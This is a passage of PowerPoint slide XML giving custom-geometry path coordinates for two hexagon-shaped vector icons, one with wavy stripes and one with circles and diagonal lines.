                  <a:gd name="connsiteX85" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY85" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX86" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY86" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX87" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY87" fmla="*/ 3538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42900" h="381000">
                    <a:moveTo>
                      <a:pt x="146636" y="6658"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="161992" y="-2219"/>
                      <a:pt x="180909" y="-2219"/>
                      <a:pt x="196264" y="6658"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="318087" y="77067"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333442" y="85944"/>
                      <a:pt x="342900" y="102346"/>
                      <a:pt x="342900" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342900" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342900" y="278663"/>
                      <a:pt x="333442" y="295065"/>
                      <a:pt x="318087" y="303933"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196264" y="374342"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="180909" y="383219"/>
                      <a:pt x="161992" y="383219"/>
                      <a:pt x="146636" y="374342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24814" y="303933"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9459" y="295065"/>
                      <a:pt x="0" y="278663"/>
                      <a:pt x="0" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="102346"/>
                      <a:pt x="9459" y="85944"/>
                      <a:pt x="24814" y="77067"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146636" y="6658"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="184448" y="27146"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="176405" y="22498"/>
                      <a:pt x="166496" y="22498"/>
                      <a:pt x="158453" y="27146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43972" y="93307"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="54172" y="95250"/>
                      <a:pt x="63328" y="96584"/>
                      <a:pt x="68968" y="96650"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88476" y="96822"/>
                      <a:pt x="108006" y="93574"/>
                      <a:pt x="126575" y="87059"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="203800" y="60160"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="212200" y="57188"/>
                      <a:pt x="220718" y="54826"/>
                      <a:pt x="229320" y="53083"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="184448" y="27146"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="263791" y="73000"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="246136" y="73314"/>
                      <a:pt x="228648" y="76467"/>
                      <a:pt x="211648" y="82477"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="134386" y="109385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134375" y="109395"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="113250" y="116796"/>
                      <a:pt x="91007" y="120501"/>
                      <a:pt x="68742" y="120301"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="68715" y="120301"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="58015" y="120186"/>
                      <a:pt x="40302" y="116938"/>
                      <a:pt x="24493" y="113452"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23929" y="115586"/>
                      <a:pt x="23632" y="117824"/>
                      <a:pt x="23632" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="145780"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40798" y="149752"/>
                      <a:pt x="59634" y="153314"/>
                      <a:pt x="68969" y="153429"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88478" y="153600"/>
                      <a:pt x="108007" y="150352"/>
                      <a:pt x="126576" y="143837"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="203773" y="116948"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203801" y="116938"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="223331" y="110033"/>
                      <a:pt x="243497" y="106423"/>
                      <a:pt x="263875" y="106118"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="263963" y="106118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264049" y="106118"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="279808" y="106118"/>
                      <a:pt x="299461" y="108633"/>
                      <a:pt x="318456" y="113633"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="316742" y="106937"/>
                      <a:pt x="312404" y="101098"/>
                      <a:pt x="306271" y="97555"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="263791" y="73000"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23632" y="202559"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23632" y="170040"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="39749" y="173622"/>
                      <a:pt x="57874" y="176956"/>
                      <a:pt x="68716" y="177079"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="68743" y="177079"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="91008" y="177279"/>
                      <a:pt x="113251" y="173574"/>
                      <a:pt x="134376" y="166173"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="134387" y="166164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211649" y="139255"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="228759" y="133198"/>
                      <a:pt x="246364" y="130045"/>
                      <a:pt x="264136" y="129778"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279623" y="129788"/>
                      <a:pt x="300189" y="132664"/>
                      <a:pt x="319269" y="138436"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319269" y="170621"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="300022" y="165478"/>
                      <a:pt x="280033" y="162896"/>
                      <a:pt x="264049" y="162896"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="263963" y="162896"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263875" y="162896"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="243497" y="163201"/>
                      <a:pt x="223331" y="166811"/>
                      <a:pt x="203801" y="173717"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="203773" y="173727"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126576" y="200616"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="108007" y="207131"/>
                      <a:pt x="88478" y="210379"/>
                      <a:pt x="68969" y="210207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59634" y="210093"/>
                      <a:pt x="40798" y="206531"/>
                      <a:pt x="23632" y="202559"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="319269" y="195215"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="300189" y="189443"/>
                      <a:pt x="279623" y="186566"/>
                      <a:pt x="264136" y="186557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="246364" y="186823"/>
                      <a:pt x="228759" y="189976"/>
                      <a:pt x="211649" y="196034"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="134387" y="222942"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134376" y="222952"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="113251" y="230353"/>
                      <a:pt x="91008" y="234058"/>
                      <a:pt x="68743" y="233858"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="68716" y="233858"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="57874" y="233734"/>
                      <a:pt x="39749" y="230400"/>
                      <a:pt x="23632" y="226819"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="259337"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40798" y="263300"/>
                      <a:pt x="59634" y="266871"/>
                      <a:pt x="68969" y="266976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88478" y="267157"/>
                      <a:pt x="108007" y="263900"/>
                      <a:pt x="126576" y="257394"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="203773" y="230505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203801" y="230495"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="223331" y="223590"/>
                      <a:pt x="243497" y="219970"/>
                      <a:pt x="263875" y="219675"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="263963" y="219675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264049" y="219675"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280033" y="219675"/>
                      <a:pt x="300022" y="222256"/>
                      <a:pt x="319269" y="227400"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319269" y="195215"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="158453" y="353854"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43986" y="287703"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="53486" y="289389"/>
                      <a:pt x="62354" y="290560"/>
                      <a:pt x="68716" y="290636"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="68743" y="290636"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="91008" y="290836"/>
                      <a:pt x="113251" y="287131"/>
                      <a:pt x="134376" y="279721"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="211649" y="252813"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="228759" y="246755"/>
                      <a:pt x="246364" y="243602"/>
                      <a:pt x="264136" y="243326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279623" y="243345"/>
                      <a:pt x="300189" y="246221"/>
                      <a:pt x="319269" y="251993"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319269" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="319269" y="270205"/>
                      <a:pt x="314314" y="278797"/>
                      <a:pt x="306271" y="283445"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="184448" y="353854"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="176405" y="358502"/>
                      <a:pt x="166496" y="358502"/>
                      <a:pt x="158453" y="353854"/>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C3ED460-6677-1070-E026-0D5B85010CC6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9268853" y="1108565"/>
                <a:ext cx="978743" cy="1087489"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 377522 w 618620"/>
                  <a:gd name="connsiteY0" fmla="*/ 539265 h 687354"/>
                  <a:gd name="connsiteX1" fmla="*/ 347677 w 618620"/>
                  <a:gd name="connsiteY1" fmla="*/ 569148 h 687354"/>
                  <a:gd name="connsiteX2" fmla="*/ 377522 w 618620"/>
                  <a:gd name="connsiteY2" fmla="*/ 599013 h 687354"/>
                  <a:gd name="connsiteX3" fmla="*/ 407367 w 618620"/>
                  <a:gd name="connsiteY3" fmla="*/ 569148 h 687354"/>
                  <a:gd name="connsiteX4" fmla="*/ 377522 w 618620"/>
                  <a:gd name="connsiteY4" fmla="*/ 539265 h 687354"/>
                  <a:gd name="connsiteX5" fmla="*/ 164354 w 618620"/>
                  <a:gd name="connsiteY5" fmla="*/ 385607 h 687354"/>
                  <a:gd name="connsiteX6" fmla="*/ 134509 w 618620"/>
                  <a:gd name="connsiteY6" fmla="*/ 415474 h 687354"/>
                  <a:gd name="connsiteX7" fmla="*/ 164354 w 618620"/>
                  <a:gd name="connsiteY7" fmla="*/ 445356 h 687354"/>
                  <a:gd name="connsiteX8" fmla="*/ 194199 w 618620"/>
                  <a:gd name="connsiteY8" fmla="*/ 415474 h 687354"/>
                  <a:gd name="connsiteX9" fmla="*/ 164354 w 618620"/>
                  <a:gd name="connsiteY9" fmla="*/ 385607 h 687354"/>
                  <a:gd name="connsiteX10" fmla="*/ 164354 w 618620"/>
                  <a:gd name="connsiteY10" fmla="*/ 342922 h 687354"/>
                  <a:gd name="connsiteX11" fmla="*/ 236831 w 618620"/>
                  <a:gd name="connsiteY11" fmla="*/ 415474 h 687354"/>
                  <a:gd name="connsiteX12" fmla="*/ 164354 w 618620"/>
                  <a:gd name="connsiteY12" fmla="*/ 488041 h 687354"/>
                  <a:gd name="connsiteX13" fmla="*/ 91875 w 618620"/>
                  <a:gd name="connsiteY13" fmla="*/ 415474 h 687354"/>
                  <a:gd name="connsiteX14" fmla="*/ 164354 w 618620"/>
                  <a:gd name="connsiteY14" fmla="*/ 342922 h 687354"/>
                  <a:gd name="connsiteX15" fmla="*/ 146134 w 618620"/>
                  <a:gd name="connsiteY15" fmla="*/ 205725 h 687354"/>
                  <a:gd name="connsiteX16" fmla="*/ 42634 w 618620"/>
                  <a:gd name="connsiteY16" fmla="*/ 222616 h 687354"/>
                  <a:gd name="connsiteX17" fmla="*/ 42634 w 618620"/>
                  <a:gd name="connsiteY17" fmla="*/ 329551 h 687354"/>
                  <a:gd name="connsiteX18" fmla="*/ 125470 w 618620"/>
                  <a:gd name="connsiteY18" fmla="*/ 246623 h 687354"/>
                  <a:gd name="connsiteX19" fmla="*/ 155617 w 618620"/>
                  <a:gd name="connsiteY19" fmla="*/ 246623 h 687354"/>
                  <a:gd name="connsiteX20" fmla="*/ 155617 w 618620"/>
                  <a:gd name="connsiteY20" fmla="*/ 276814 h 687354"/>
                  <a:gd name="connsiteX21" fmla="*/ 42634 w 618620"/>
                  <a:gd name="connsiteY21" fmla="*/ 389920 h 687354"/>
                  <a:gd name="connsiteX22" fmla="*/ 42634 w 618620"/>
                  <a:gd name="connsiteY22" fmla="*/ 470701 h 687354"/>
                  <a:gd name="connsiteX23" fmla="*/ 66082 w 618620"/>
                  <a:gd name="connsiteY23" fmla="*/ 511358 h 687354"/>
                  <a:gd name="connsiteX24" fmla="*/ 164307 w 618620"/>
                  <a:gd name="connsiteY24" fmla="*/ 568134 h 687354"/>
                  <a:gd name="connsiteX25" fmla="*/ 311287 w 618620"/>
                  <a:gd name="connsiteY25" fmla="*/ 420988 h 687354"/>
                  <a:gd name="connsiteX26" fmla="*/ 341435 w 618620"/>
                  <a:gd name="connsiteY26" fmla="*/ 420988 h 687354"/>
                  <a:gd name="connsiteX27" fmla="*/ 341435 w 618620"/>
                  <a:gd name="connsiteY27" fmla="*/ 451179 h 687354"/>
                  <a:gd name="connsiteX28" fmla="*/ 202534 w 618620"/>
                  <a:gd name="connsiteY28" fmla="*/ 590232 h 687354"/>
                  <a:gd name="connsiteX29" fmla="*/ 285861 w 618620"/>
                  <a:gd name="connsiteY29" fmla="*/ 638382 h 687354"/>
                  <a:gd name="connsiteX30" fmla="*/ 332760 w 618620"/>
                  <a:gd name="connsiteY30" fmla="*/ 638382 h 687354"/>
                  <a:gd name="connsiteX31" fmla="*/ 342568 w 618620"/>
                  <a:gd name="connsiteY31" fmla="*/ 632710 h 687354"/>
                  <a:gd name="connsiteX32" fmla="*/ 305045 w 618620"/>
                  <a:gd name="connsiteY32" fmla="*/ 569148 h 687354"/>
                  <a:gd name="connsiteX33" fmla="*/ 377522 w 618620"/>
                  <a:gd name="connsiteY33" fmla="*/ 496579 h 687354"/>
                  <a:gd name="connsiteX34" fmla="*/ 450000 w 618620"/>
                  <a:gd name="connsiteY34" fmla="*/ 569148 h 687354"/>
                  <a:gd name="connsiteX35" fmla="*/ 449996 w 618620"/>
                  <a:gd name="connsiteY35" fmla="*/ 569920 h 687354"/>
                  <a:gd name="connsiteX36" fmla="*/ 449985 w 618620"/>
                  <a:gd name="connsiteY36" fmla="*/ 570642 h 687354"/>
                  <a:gd name="connsiteX37" fmla="*/ 552538 w 618620"/>
                  <a:gd name="connsiteY37" fmla="*/ 511358 h 687354"/>
                  <a:gd name="connsiteX38" fmla="*/ 575986 w 618620"/>
                  <a:gd name="connsiteY38" fmla="*/ 470701 h 687354"/>
                  <a:gd name="connsiteX39" fmla="*/ 575986 w 618620"/>
                  <a:gd name="connsiteY39" fmla="*/ 406227 h 687354"/>
                  <a:gd name="connsiteX40" fmla="*/ 500514 w 618620"/>
                  <a:gd name="connsiteY40" fmla="*/ 481786 h 687354"/>
                  <a:gd name="connsiteX41" fmla="*/ 470366 w 618620"/>
                  <a:gd name="connsiteY41" fmla="*/ 481786 h 687354"/>
                  <a:gd name="connsiteX42" fmla="*/ 470366 w 618620"/>
                  <a:gd name="connsiteY42" fmla="*/ 451609 h 687354"/>
                  <a:gd name="connsiteX43" fmla="*/ 575986 w 618620"/>
                  <a:gd name="connsiteY43" fmla="*/ 345877 h 687354"/>
                  <a:gd name="connsiteX44" fmla="*/ 575986 w 618620"/>
                  <a:gd name="connsiteY44" fmla="*/ 279255 h 687354"/>
                  <a:gd name="connsiteX45" fmla="*/ 504348 w 618620"/>
                  <a:gd name="connsiteY45" fmla="*/ 290872 h 687354"/>
                  <a:gd name="connsiteX46" fmla="*/ 417748 w 618620"/>
                  <a:gd name="connsiteY46" fmla="*/ 377564 h 687354"/>
                  <a:gd name="connsiteX47" fmla="*/ 387602 w 618620"/>
                  <a:gd name="connsiteY47" fmla="*/ 377564 h 687354"/>
                  <a:gd name="connsiteX48" fmla="*/ 387602 w 618620"/>
                  <a:gd name="connsiteY48" fmla="*/ 347389 h 687354"/>
                  <a:gd name="connsiteX49" fmla="*/ 447232 w 618620"/>
                  <a:gd name="connsiteY49" fmla="*/ 287691 h 687354"/>
                  <a:gd name="connsiteX50" fmla="*/ 380232 w 618620"/>
                  <a:gd name="connsiteY50" fmla="*/ 271384 h 687354"/>
                  <a:gd name="connsiteX51" fmla="*/ 380211 w 618620"/>
                  <a:gd name="connsiteY51" fmla="*/ 271384 h 687354"/>
                  <a:gd name="connsiteX52" fmla="*/ 346579 w 618620"/>
                  <a:gd name="connsiteY52" fmla="*/ 259665 h 687354"/>
                  <a:gd name="connsiteX53" fmla="*/ 273221 w 618620"/>
                  <a:gd name="connsiteY53" fmla="*/ 333109 h 687354"/>
                  <a:gd name="connsiteX54" fmla="*/ 243073 w 618620"/>
                  <a:gd name="connsiteY54" fmla="*/ 333109 h 687354"/>
                  <a:gd name="connsiteX55" fmla="*/ 243073 w 618620"/>
                  <a:gd name="connsiteY55" fmla="*/ 302934 h 687354"/>
                  <a:gd name="connsiteX56" fmla="*/ 301847 w 618620"/>
                  <a:gd name="connsiteY56" fmla="*/ 244097 h 687354"/>
                  <a:gd name="connsiteX57" fmla="*/ 240823 w 618620"/>
                  <a:gd name="connsiteY57" fmla="*/ 222840 h 687354"/>
                  <a:gd name="connsiteX58" fmla="*/ 146134 w 618620"/>
                  <a:gd name="connsiteY58" fmla="*/ 205725 h 687354"/>
                  <a:gd name="connsiteX59" fmla="*/ 309310 w 618620"/>
                  <a:gd name="connsiteY59" fmla="*/ 42684 h 687354"/>
                  <a:gd name="connsiteX60" fmla="*/ 285861 w 618620"/>
                  <a:gd name="connsiteY60" fmla="*/ 48973 h 687354"/>
                  <a:gd name="connsiteX61" fmla="*/ 75955 w 618620"/>
                  <a:gd name="connsiteY61" fmla="*/ 170293 h 687354"/>
                  <a:gd name="connsiteX62" fmla="*/ 146290 w 618620"/>
                  <a:gd name="connsiteY62" fmla="*/ 163058 h 687354"/>
                  <a:gd name="connsiteX63" fmla="*/ 146446 w 618620"/>
                  <a:gd name="connsiteY63" fmla="*/ 163058 h 687354"/>
                  <a:gd name="connsiteX64" fmla="*/ 146605 w 618620"/>
                  <a:gd name="connsiteY64" fmla="*/ 163058 h 687354"/>
                  <a:gd name="connsiteX65" fmla="*/ 254984 w 618620"/>
                  <a:gd name="connsiteY65" fmla="*/ 182578 h 687354"/>
                  <a:gd name="connsiteX66" fmla="*/ 255032 w 618620"/>
                  <a:gd name="connsiteY66" fmla="*/ 182596 h 687354"/>
                  <a:gd name="connsiteX67" fmla="*/ 394304 w 618620"/>
                  <a:gd name="connsiteY67" fmla="*/ 231106 h 687354"/>
                  <a:gd name="connsiteX68" fmla="*/ 498232 w 618620"/>
                  <a:gd name="connsiteY68" fmla="*/ 248393 h 687354"/>
                  <a:gd name="connsiteX69" fmla="*/ 575986 w 618620"/>
                  <a:gd name="connsiteY69" fmla="*/ 235523 h 687354"/>
                  <a:gd name="connsiteX70" fmla="*/ 575986 w 618620"/>
                  <a:gd name="connsiteY70" fmla="*/ 216654 h 687354"/>
                  <a:gd name="connsiteX71" fmla="*/ 552538 w 618620"/>
                  <a:gd name="connsiteY71" fmla="*/ 175997 h 687354"/>
                  <a:gd name="connsiteX72" fmla="*/ 332760 w 618620"/>
                  <a:gd name="connsiteY72" fmla="*/ 48973 h 687354"/>
                  <a:gd name="connsiteX73" fmla="*/ 309310 w 618620"/>
                  <a:gd name="connsiteY73" fmla="*/ 42684 h 687354"/>
                  <a:gd name="connsiteX74" fmla="*/ 309309 w 618620"/>
                  <a:gd name="connsiteY74" fmla="*/ 0 h 687354"/>
                  <a:gd name="connsiteX75" fmla="*/ 354077 w 618620"/>
                  <a:gd name="connsiteY75" fmla="*/ 12011 h 687354"/>
                  <a:gd name="connsiteX76" fmla="*/ 573854 w 618620"/>
                  <a:gd name="connsiteY76" fmla="*/ 139035 h 687354"/>
                  <a:gd name="connsiteX77" fmla="*/ 618620 w 618620"/>
                  <a:gd name="connsiteY77" fmla="*/ 216654 h 687354"/>
                  <a:gd name="connsiteX78" fmla="*/ 618620 w 618620"/>
                  <a:gd name="connsiteY78" fmla="*/ 470701 h 687354"/>
                  <a:gd name="connsiteX79" fmla="*/ 573854 w 618620"/>
                  <a:gd name="connsiteY79" fmla="*/ 548320 h 687354"/>
                  <a:gd name="connsiteX80" fmla="*/ 354077 w 618620"/>
                  <a:gd name="connsiteY80" fmla="*/ 675344 h 687354"/>
                  <a:gd name="connsiteX81" fmla="*/ 264544 w 618620"/>
                  <a:gd name="connsiteY81" fmla="*/ 675344 h 687354"/>
                  <a:gd name="connsiteX82" fmla="*/ 44766 w 618620"/>
                  <a:gd name="connsiteY82" fmla="*/ 548320 h 687354"/>
                  <a:gd name="connsiteX83" fmla="*/ 0 w 618620"/>
                  <a:gd name="connsiteY83" fmla="*/ 470701 h 687354"/>
                  <a:gd name="connsiteX84" fmla="*/ 0 w 618620"/>
                  <a:gd name="connsiteY84" fmla="*/ 216654 h 687354"/>
                  <a:gd name="connsiteX85" fmla="*/ 44766 w 618620"/>
                  <a:gd name="connsiteY85" fmla="*/ 139035 h 687354"/>
                  <a:gd name="connsiteX86" fmla="*/ 264544 w 618620"/>
                  <a:gd name="connsiteY86" fmla="*/ 12011 h 687354"/>
                  <a:gd name="connsiteX87" fmla="*/ 309309 w 618620"/>
                  <a:gd name="connsiteY87" fmla="*/ 0 h 6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18620" h="687354">
                    <a:moveTo>
                      <a:pt x="377522" y="539265"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="361040" y="539265"/>
                      <a:pt x="347677" y="552652"/>
                      <a:pt x="347677" y="569148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347677" y="585645"/>
                      <a:pt x="361040" y="599013"/>
                      <a:pt x="377522" y="599013"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="394005" y="599013"/>
                      <a:pt x="407367" y="585645"/>
                      <a:pt x="407367" y="569148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="407367" y="552652"/>
                      <a:pt x="394005" y="539265"/>
                      <a:pt x="377522" y="539265"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="164354" y="385607"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147872" y="385607"/>
                      <a:pt x="134509" y="398977"/>
                      <a:pt x="134509" y="415474"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134509" y="431986"/>
                      <a:pt x="147872" y="445356"/>
                      <a:pt x="164354" y="445356"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180836" y="445356"/>
                      <a:pt x="194199" y="431986"/>
                      <a:pt x="194199" y="415474"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194199" y="398977"/>
                      <a:pt x="180836" y="385607"/>
                      <a:pt x="164354" y="385607"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="164354" y="342922"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="204381" y="342922"/>
                      <a:pt x="236831" y="375417"/>
                      <a:pt x="236831" y="415474"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236831" y="455546"/>
                      <a:pt x="204381" y="488041"/>
                      <a:pt x="164354" y="488041"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124325" y="488041"/>
                      <a:pt x="91875" y="455546"/>
                      <a:pt x="91875" y="415474"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91875" y="375417"/>
                      <a:pt x="124325" y="342922"/>
                      <a:pt x="164354" y="342922"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="146134" y="205725"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="117099" y="205759"/>
                      <a:pt x="78165" y="211362"/>
                      <a:pt x="42634" y="222616"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42634" y="329551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125470" y="246623"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="133794" y="238288"/>
                      <a:pt x="147293" y="238288"/>
                      <a:pt x="155617" y="246623"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163941" y="254956"/>
                      <a:pt x="163941" y="268481"/>
                      <a:pt x="155617" y="276814"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42634" y="389920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42634" y="470701"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="42634" y="487472"/>
                      <a:pt x="51571" y="502973"/>
                      <a:pt x="66082" y="511358"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="164307" y="568134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311287" y="420988"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="319613" y="412671"/>
                      <a:pt x="333111" y="412671"/>
                      <a:pt x="341435" y="420988"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="349761" y="429323"/>
                      <a:pt x="349761" y="442846"/>
                      <a:pt x="341435" y="451179"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="202534" y="590232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285861" y="638382"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="300371" y="646767"/>
                      <a:pt x="318249" y="646767"/>
                      <a:pt x="332760" y="638382"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342568" y="632710"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="320198" y="620373"/>
                      <a:pt x="305045" y="596522"/>
                      <a:pt x="305045" y="569148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305045" y="529074"/>
                      <a:pt x="337493" y="496579"/>
                      <a:pt x="377522" y="496579"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417551" y="496579"/>
                      <a:pt x="450000" y="529074"/>
                      <a:pt x="450000" y="569148"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="449996" y="569920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449985" y="570642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552538" y="511358"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="567049" y="502973"/>
                      <a:pt x="575986" y="487472"/>
                      <a:pt x="575986" y="470701"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="575986" y="406227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500514" y="481786"/>
                    </a:lnTo>
                    <a:cubicBezTo>
